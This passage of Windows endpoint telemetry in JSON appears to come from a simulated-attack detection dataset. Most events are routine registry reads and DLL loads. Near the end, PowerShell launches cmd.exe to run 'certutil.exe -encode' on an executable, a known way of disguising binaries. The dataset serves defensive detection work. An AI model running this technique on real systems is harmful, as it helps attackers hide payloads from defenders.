131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "WmiPerfInst.dll", - "image_path": "C:\\Windows\\System32\\wbem\\WmiPerfInst.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883573489490000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "pdh.dll", - "image_path": "C:\\Windows\\System32\\pdh.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573489330000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "image_load", - "image_name": "perfos.dll", - "image_path": "C:\\Windows\\System32\\perfos.dll", - "pid": 4036, - "process_name": "WmiPrvSE.exe", - "process_path": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe", - "timestamp": 131883573491520000, - "unique_pid": "{42FC7E13-CBE4-5C05-0000-00100C755501}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494790000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494790000, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "event_type": "registry", - "pid": 7036, - "process_name": "powershell.exe", - "process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883573494950016, - "unique_pid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"certutil.exe -encode c:\\file.exe file.txt\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 204, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883573496150000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496040000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 204, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883573496200016, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}" - }, - { - "command_line": "certutil.exe -encode c:\\file.exe file.txt", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 904, - "ppid": 204, - "process_name": "certutil.exe", - "process_path": "C:\\Windows\\System32\\certutil.exe", - "subtype": "create", - "timestamp": 131883573496310000, - "unique_pid": "{42FC7E13-CBE5-5C05-0000-00108D9C5501}", - "unique_ppid": "{42FC7E13-CBE5-5C05-0000-0010979B5501}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 904, - "process_name": "certutil.exe", 